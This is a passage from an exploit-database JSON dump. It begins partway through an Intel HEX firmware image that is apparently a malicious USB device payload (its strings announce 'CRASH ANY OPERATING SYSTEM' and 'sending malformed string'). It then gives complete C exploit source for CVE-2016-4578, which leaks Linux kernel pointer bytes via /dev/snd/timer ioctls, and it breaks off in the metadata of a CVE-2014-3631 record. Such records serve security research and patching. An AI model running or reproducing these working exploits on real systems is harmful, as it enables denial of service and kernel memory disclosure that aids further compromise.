00AA00094E09F938F930E94810642E050E062E8B9\n:100AB00071E080E00E94DE030F900F900F900F9086\n:100AC00035C04091000150E060E071E080E00E949C\n:100AD000DE032CC0873071F1883021F481E08093EF\n:100AE000F10024C0893011F5937021F5EDE4F1E0B7\n:100AF00081E021E096E38093E9002093EB003491BC\n:100B00003093EC009093ED008F5F3196843099F72D\n:100B10008EE78093EA001092EA008C85809372053C\n:100B200005C0888999890E94D30304C08EEF809301\n:100B3000E80003C081E28093EB0062960FB6F89460\n:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F\n:100B5000AF919F918F917F916F915F914F913F9155\n:100B60002F911F910F91FF90EF90DF90CF90BF904A\n:100B7000AF909F908F907F906F900F900FBE0F90CF\n:100B80001F9018951F920F920FB60F9211248F93FA\n:100B90009F938091E1001092E10083FF0FC01092BB\n:100BA000E90091E09093EB001092EC0092E39093B7\n:100BB000ED001092720598E09093F00082FF1AC049\n:100BC00080917E05882339F080917E058150809345\n:100BD0007E05882369F080917D05882359F08091F6\n:100BE0007D05815080937D05811104C0289A02C043\n:100BF0005D9AF1CF9F918F910F900FBE0F901F9034\n:100C00001895CF93DF93CDB7DEB782E1FE0135961D\n:100C1000A0E0B1E001900D928A95E1F78F89988D5F\n:100C20009093760580937505898D9A8D90937405C0\n:100C3000809373058B8D9C8D90937C0580937B05B1\n:100C40008D8D9E8D90937A05809379058F8D98A1D7\n:100C500090937805809377051092720581E08093D8\n:100C6000D70080EA8093D80082E189BD09B400FEF4\n:100C7000FDCF61E070E080E090E00E94790280E9C1\n:100C80008093D8008CE08093E2001092E000559AA7\n:100C9000209ADF91CF91089581E08093E00008953C\n:100CA0009091C80095FFFCCF8093CE0008951092DC\n:100CB000CD0087E68093CC0088E18093C9008EE068\n:100CC0008093CA0008950F931F93CF93DF93EC0195\n:100CD0008C01FE0101900020E9F73197EC1BFD0B20\n:100CE000C8018C1B9D0B8E179F0730F4F801819172\n:100CF0008F010E945006EDCFDF91CF911F910F9190\n:100D00000895CF93DF93CDB7DEB7DA950FB6F89499\n:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193\n:100D20009F0160E071E0CE0101960E940507CE01AF\n:100D300001960E946306D3950FB6F894DEBF0FBEEE\n:100D4000CDBFDF91CF9108958F929F92AF92BF92C6\n:100D5000CF92DF92EF92FF920F931F93CF93DF9387\n:100D600000D0CDB7DEB75B0122E535E03F932F938E\n:100D700089839A830E9481068981882E9A81992E7F\n:100D80000F900F9000E010E08EE5E82E85E0F82E41\n:100D900091E1C92E94E0D92E0A151B05E4F4F40163\n:100DA00081914F0190E09F938F93FF92EF920E9469\n:100DB00081060F5F1F4FC8018F7099270F900F900A\n:100DC0000F900F90892B41F7DF92CF920E948106FE\n:100DD0000F900F90E1CF81E194E09F938F930E9459\n:100DE00081060F900F900F900F90DF91CF911F9180\n:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA\n:100E00008F900895F8940C94E609AEE0B0E0EBE022\n:100E1000F7E00C94BD098C01CA0146E04C831A83AB\n:100E2000098377FF02C060E070E8615071097E833A\n:100E30006D83A901BC01CE0101960E9431074D814D\n:100E40005E8157FD0AC02F813885421753070CF485\n:100E50009A01F801E20FF31F10822E96E4E00C9441\n:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E\n:100E70006B018A01FC0117821682838181FFBDC14B\n:100E8000CE0101964C01F7019381F60193FD859106\n:100E900093FF81916F01882309F4ABC1853239F446\n:100EA00093FD859193FF81916F01853229F4B701FC\n:100EB00090E00E941909E7CF512C312C20E020321C\n:100EC000A0F48B3269F030F4803259F0833269F447\n:100ED00020612CC08D3239F0803339F4216026C076\n:100EE0002260246023C0286021C027FD27C030ED88\n:100EF000380F3A3078F426FF06C0FAE05F9E300DD6\n:100F00001124532E13C08AE0389E300D1124332E45\n:100F100020620CC08E3221F426FD6BC1206406C015\n:100F20008C3611F4206802C0883641F4F60193FD36\n:100F3000859193FF81916F018111C1CF982F9F7D82\n:100F40009554933028F40C5F1F4FFFE3F9830DC0D5\n:100F5000833631F0833771F0833509F05BC022C0EE\n:100F6000F801808189830E5F1F4F44244394512CE4\n:100F7000540115C03801F2E06F0E711CF801A08019\n:100F8000B18026FF03C0652D70E002C06FEF7FEFD8\n:100F9000C5012C870E940E092C0183012C852F7717\n:100FA000222E17C03801F2E06F0E711CF801A080EC\n:100FB000B18026FF03C0652D70E002C06FEF7FEFA8\n:100FC000C5012C870E9403092C012C852068222E44\n:100FD000830123FC1BC0832D90E048165906B0F412\n:100FE000B70180E290E00E9419093A94F4CFF5012C\n:100FF00027FC859127FE81915F01B70190E00E9457\n:10100000190931103A94F1E04F1A51084114510472\n:1010100071F7E5C0843611F0893639F5F80127FFFC\n:1010200007C060817181828193810C5F1F4F08C06E\n:1010300060817181882777FD8095982F0E5F1F4F03\n:101040002F76B22E97FF09C0909580957095619587\n:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF\n:101060000E944B09A82EA81844C0853729F42F7E6A\n:10107000B22E2AE030E025C0F22FF97FBF2E8F3646\n:10108000C1F018F4883579F0B4C0803719F088378A\n:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA\n:1010A0008460B82E09C024FF0AC09F2F9660B92E15\n:1010B00006C028E030E005C020E130E002C020E1B9\n:1010C00032E0F801B7FE07C06081718182819381AF\n:1010D0000C5F1F4F06C06081718180E090E00E5F61\n:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3\n:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0\n:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8\n:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E\n:10112000F11D8081803311F4297E09C022FF06C0A1\n:101130007394739404C0822F867809F0739423FD0E\n:1011400013C020FF06C05A2C731418F4530C571800\n:10115000732C731468F4B70180E290E02C870E942E\n:10116000190973942C85F5CF731410F4371801C046\n:10117000312C24FF12C0B70180E390E02C870E943D\n:1011800019092C8522FF17C021FF03C088E590E0D4\n:1011900002C088E790E0B7010CC0822F867859F032\n:1011A00021FD02C080E201C08BE227FD8DE2B70184\n:1011B00090E00E941909A51438F4B70180E390E08B\n:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F\n:1011D0008081B70190E00E941909A110F5CF33205A\n:1011E00009F451CEB70180E290E00E9419093A94C7\n:1011F000F6CFF7018681978102C08FEF9FEF2C9683\n:10120000E2E10C94CB09FC010590615070400110A3\n:10121000D8F7809590958E0F9F1F0895FC0161501F\n:10122000704001900110D8F7809590958E0F9F1F08\n:1012300008950F931F93CF93DF93182F092FEB017E\n:101240008B8181FD03C08FEF9FEF20C082FF10C014\n:101250004E815F812C813D81421753077CF4E881E8\n:10126000F9819F012F5F3F4F39832883108306C088\n:10127000E885F985812F0995892B29F72E813F81F2\n:101280002F5F3F4F3F832E83812F902FDF91CF9190\n:101290001F910F910895FA01AA27283051F12031AA\n:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA\n:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C\n:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A\n:1012D000711D811D911DA11D20D009F468943F91BD\n:1012E0002AE0269F11243019305D3193DEF6CF01BC\n:1012F0000895462F4770405D4193B3E00FD0C9F782\n:10130000F6CF462F4F70405D4A3318F0495D31FDEE\n:101310004052419302D0A9F7EACFB4E0A695979541\n:10132000879577956795BA95C9F700976105710517\n:1013300008959B01AC010A2E069457954795379561\n:101340002795BA95C9F7620F731F841F951FA01DBB\n:101350000895EE0FFF1F0590F491E02D09942F9250\n:101360003F924F925F926F927F928F929F92AF9235\n:10137000BF92CF92DF92EF92FF920F931F93CF9382\n:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19\n:101390000FBECDBF09942A88398848885F846E843F\n:1013A0007D848C849B84AA84B984C884DF80EE8089\n:1013B000FD800C811B81AA81B981CE0FD11D0FB692\n:1013C000F894DEBF0FBECDBFED010895F894FFCFB6\n:1013D0001201000200000040AD0BEFBE000101024F\n:1013E000000122034200610064002000420041002D\n:1013F00042004500250078002500780025006E0099\n:101400002500700018034200410044002000430002\n:101410003000460046004500450021001201000250\n:1014200000000040580403500001010203010902BA\n:10143000270001010000FA0705810304040C0705D9\n:10144000010204000C0705820104000C07000700DC\n:101450000700480100500072006F006C00690066D0\n:101460000069006300000A550000006BFD180A00C7\n:10147000809F0AB901312B940A8101128946001319\n:10148000000257028B0A5E0AF80A5F01F21201009D\n:1014900002010000400D055702000101020301B9DD\n:1014A0000A0100F80A5F0A810A220342006100640F\n:1014B0000020004200410042004500250078002540\n:1014C00000780025006E00250070001803420041DE\n:1014D000004400200043003000460046004500451F\n:1014E00000210012010002010000400D055702001A\n:1014F000010102030109040000030100000003F2DE\n:101500000AEC0A0902270001010000FA01AB0A09EE\n:101510000400000301000000090200202020202018\n:101520005F5F5F5F5F5F5F5F2020202020202020C3\n:1015300020202020202020202020202020202020AB\n:1015400020205F5F5F5F5F205F5F20205F202020A3\n:101550002020205F5F0A0D00202020202F205F5FC9\n:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7\n:101570005F5F20205F5F5F5F5F20202020202F20A3\n:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7\n:10159000202F5F5F0A0D002020202F202F202020E9\n:1015A0002F205F5F205C2F205F5F20602F205F5F18\n:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E\n:1015C000205C2F205F5F2F202F205F5F5F2F202F59\n:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D\n:1015E0002F202F202F202F5F2F202F202F5F2F2005\n:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4\n:101600002F202F5F2F202F202F5F5F2F202C3C0AB1\n:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B\n:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63\n:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8\n:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048\n:101650003C3C2043485241534820414E59204F5072\n:1016600045524154494E472053595354454D203E0D\n:101670003E0A0D00203C3C202863292053657267F8\n:10168000656A20536368756D696C6F20323031353F\n:101690002C204F70656E536F7572636520536563C0\n:1016A00075726974792052616C66205370656E6E34\n:1016B0006562657267203E3E0A0D000A3E3E20507C\n:1016C0007265737320627574746F6E20746F20730B\n:1016D0007461727420657865637574696F6E2E2EFF\n:1016E0002E0A0D005B44454255475D2045786563F1\n:1016F000757465207061796C6F616420300A0D002B\n:10170000526563762D446174613A0A0D005B44456D\n:101710004255475D200953656E6420436F6E6669CC\n:101720006775726174696F6E446573637269707412\n:101730006F720928696E6465783A2569292E2E2E04\n:101740000D0A005B44454255475D200953656E64B0\n:1017500020496E74657266616365204465736372C7\n:101760006970746F720928696E7465726661636569\n:101770003A2569292E2E2E0D0A005B444542554715\n:101780005D200953656E6420456E64706F696E74E8\n:101790002044657363726970746F720928656E64A2\n:1017A000706F696E743A2569292E2E2E0D0A005B22\n:1017B00044454255475D203C3C70616E6963206D35\n:1017C0006F64653F3E3E0D0A005B44454255475DF0\n:1017D0002009203E3E20537472696E672044657371\n:1017E00063726970746F72207265717565737420AD\n:1017F0002D2073656E64696E67206D616C666F7213\n:101800006D656420737472696E67212073657475E9\n:10181000702E7756616C75654C203D3D2025690D15\n:101820000A005B48455844554D505D0A0D0025306F\n:04183000325820000A\n:00000001FF", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4 (Ubuntu 16.04) - snd_timer_user_ccallback() Kernel Pointer Leak", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-11T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4 (Ubuntu 16.04) - snd_timer_user_ccallback() Kernel Pointer Leak", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4578"], "modified": "2019-03-11T00:00:00", "id": "EXPLOITPACK:4C655D3CA17B7B7E6BE5BEFF9024D311", "href": "", "sourceData": "#include <stdio.h>\n#include <errno.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdint.h>\n#include <sys/syscall.h>\n#include <asm/unistd_64.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <sys/mman.h>\n#include <sys/stat.h>\n#include <sys/ioctl.h>\n#include <sound/asound.h>\n\n# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()\n\n# Google Dork: -\n\n# Date: 2019-03-11\n\n# Exploit Author: wally0813\n\n# Vendor Homepage: -\n\n# Software Link: -\n\n# Version: Linux Kernel 4.4 (Ubuntu 16.04)\n\n# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\n\n# CVE: CVE-2016-4578\n\n# Category: Local\n\n\n\n/*\n * [ Briefs ]\n * - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()\n * - This is local exploit against the CVE-2016-4578.\n *\n * [ Tested version ]\n * - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\n *\n * [ Prerequisites ]\n * - \n *\n * [ Goal ]\n * - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()\n *\n * [ Run exploit ]\n * - $ gcc -o poc poc.c\n * - $ sudo ./poc\n * leak_value(event) : ffff8800\n * leak_value(val) : ffffffff\n *\n * [ Contact ]\n * - soyeoni0813@gmail.com\n */\n\n\n\nint fd;\n\nvoid leak(){\n\n\tstruct snd_timer_tread td;\n\tstruct snd_timer_select st;\n\tstruct snd_timer_params ps;\n\tint r;\n\tunsigned int leak_value_e, leak_value_v;\n\tint tread;\n\n\tmemset(&td,0,sizeof(td));\n\tmemset(&st,0,sizeof(st));\n\tmemset(&ps,0,sizeof(ps));\n\n\n\t// set tread\n\ttread = 1;\n\tps.filter |= 1<<SNDRV_TIMER_EVENT_START;\n\tps.ticks = 1000 * 1000;\n\n\tr = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);\n\tif (r) {\n\t\tprintf(\"SNDRV_TIMER_IOCTL_TREAD error : %d, %s\\n\", errno, strerror(errno));\n\t\treturn;\n\t}\n\n\n\t// vuln trigger\n\tst.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;\n\tst.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;\n\tr = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);\n\tif (r) {\n\t\tprintf(\"SNDRV_TIMER_IOCTL_SELECT error : %d, %s\\n\", errno, strerror(errno));\n\t\treturn;\n\t}\n\n\tr = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);\n\tif (r) {\n\t\tprintf(\"SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\\n\", errno, strerror(errno));\n\t\treturn;\n\t}\n\n\tr = ioctl(fd, SNDRV_TIMER_IOCTL_START);\n if (r) {\n \tprintf(\"SNDRV_TIMER_IOCTL_START error : %d, %s\\n\", errno, strerror(errno));\n \treturn;\n\t}\n\n\n // get leak\n\tr = read(fd, &td, sizeof(td));\n\t\n\tleak_value_e = *((unsigned long *)(&td.event+1));\n\tprintf(\"leak_value(event) : %lx\\n\", leak_value_e);\n\n\tleak_value_v = *((unsigned long *)(&td.val+1));\n\tprintf(\"leak_value(val) : %lx\\n\", leak_value_v);\n\n}\n\nint main(int argc, char **argv)\n{\n\tfd = open(\"/dev/snd/timer\", O_RDWR);\n\n\tif (fd < 0) {\n\t\tprintf(\"open error : %d, %s\\n\", errno, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tleak();\n\tclose(fd);\n\treturn 0;\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)", "cvss3": {}, "published": "2015-03-04T00:00:00", "type": "exploitpack", "title": "Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3631"], "modified": "2015-03-04T00:00:00", "id": "EXPLOITPACK:F5674